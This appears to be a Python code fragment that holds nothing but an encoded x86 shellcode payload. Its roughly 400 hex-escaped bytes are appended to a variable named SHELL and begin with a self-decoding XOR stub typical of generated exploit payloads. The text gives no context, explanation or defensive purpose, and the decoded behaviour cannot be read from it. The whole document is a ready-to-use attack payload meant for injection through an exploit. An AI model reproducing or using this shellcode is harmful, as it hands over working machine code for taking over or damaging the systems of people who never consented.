SHELL =  b""
SHELL += b"\x29\xc9\x83\xe9\xa2\xe8\xff\xff\xff\xff\xc0\x5e"
SHELL += b"\x81\x76\x0e\xb3\xaa\x90\x87\x83\xee\xfc\xe2\xf4"
SHELL += b"\x4f\x42\x1f\x87\xb3\xaa\xf0\x0e\x56\x9b\x42\xe3"
SHELL += b"\x38\xf8\xa0\x0c\xe1\xa6\x1b\xd5\xa7\xa5\x27\xcd"
SHELL += b"\x95\x9b\x6f\x0c\xc1\x82\xa1\x47\x1f\x96\xf1\xfb"
SHELL += b"\xb1\x86\xb0\x46\x7c\xa7\x91\x40\xfa\xdf\x7f\xd5"
SHELL += b"\x38\xf8\x80\x0c\xf1\x96\xc7\x86\x63\x21\xd0\xff"
SHELL += b"\x36\x6a\xe4\xcb\xb2\x7a\x1b\xdf\x93\x21\xd8\x9f"
SHELL += b"\xe3\xab\x43\x02\x7a\xde\xac\xce\x38\x9e\x1b\x86"
SHELL += b"\x65\x9b\x6f\xb6\x73\x6b\x5f\x8a\x1f\xab\x57\xbf"
SHELL += b"\x53\xdf\x64\x84\xce\x52\xab\xfa\x97\xdf\x70\xdf"
SHELL += b"\x38\xf2\xb4\x86\x60\xcc\x1b\x8b\xf8\x21\xc8\x9b"
SHELL += b"\xb2\x79\x1b\x83\x38\xab\x40\x0e\xf7\x8e\xb4\xdc"
SHELL += b"\xe8\xcb\xc9\xdd\xe2\x55\x70\xdf\xec\xf0\x1b\x95"
SHELL += b"\x5a\x2a\x6f\x78\x4c\xf7\xf8\xb4\x81\xaa\x90\xef"
SHELL += b"\xc4\xd9\xa2\xd8\xe7\xc2\xdc\xf0\x95\xad\x19\x6f"
SHELL += b"\x4c\x7a\x28\x17\xb2\xaa\x90\xae\x77\xfe\xc0\xef"
SHELL += b"\x9a\x2a\xfb\x87\x4c\x7f\xfa\x8d\xdb\x6a\x38\xb6"
SHELL += b"\x74\xc2\x92\x87\xa2\xf6\x19\x61\xe3\xfa\xc0\xd7"
SHELL += b"\xf3\xfa\xd0\xd7\xdb\x40\x9f\x58\x53\x55\x45\x10"
SHELL += b"\xd9\xba\xc6\xd0\xdb\x33\x35\xf3\xd2\x55\x45\x02"
SHELL += b"\x73\xde\x9a\x78\xfd\xa2\xe5\x6b\x5b\xcd\x90\x87"
SHELL += b"\xb3\xc0\x90\xed\xb7\xfc\xc7\xef\xb1\x73\x58\xd8"
SHELL += b"\x4c\x7f\x13\x7f\xb3\xd4\xa6\x0c\x85\xc0\xd0\xef"
SHELL += b"\xb3\xba\x90\x87\xe5\xc0\x90\xef\xeb\x0e\xc3\x62"
SHELL += b"\x4c\x7f\x03\xd4\xd9\xaa\xc6\xd4\xe4\xc2\x92\x5e"
SHELL += b"\x7b\xf5\x6f\x52\x30\x52\x90\xfa\x9b\xf2\xf8\x87"
SHELL += b"\xf3\xaa\x90\xed\xb3\xfa\xf8\x8c\x9c\xa5\xa0\x78"
SHELL += b"\x66\xfd\xf8\xf2\xdd\xe7\xf1\x78\x66\xf4\xce\x78"
SHELL += b"\xbf\x8e\x9f\x02\xc3\x55\x6f\x78\x5a\x31\x6f\x78"
SHELL += b"\x4c\xab\x53\xae\x75\xdf\x51\x44\x08\x4a\x8d\xad"
SHELL += b"\xb9\xc2\x36\x12\x0e\x37\x6f\x52\x8f\xac\xec\x8d"
SHELL += b"\x33\x51\x70\xf2\xb6\x11\xd7\x94\xc1\xc5\xfa\x87"
SHELL += b"\xe0\x55\x45\x87"
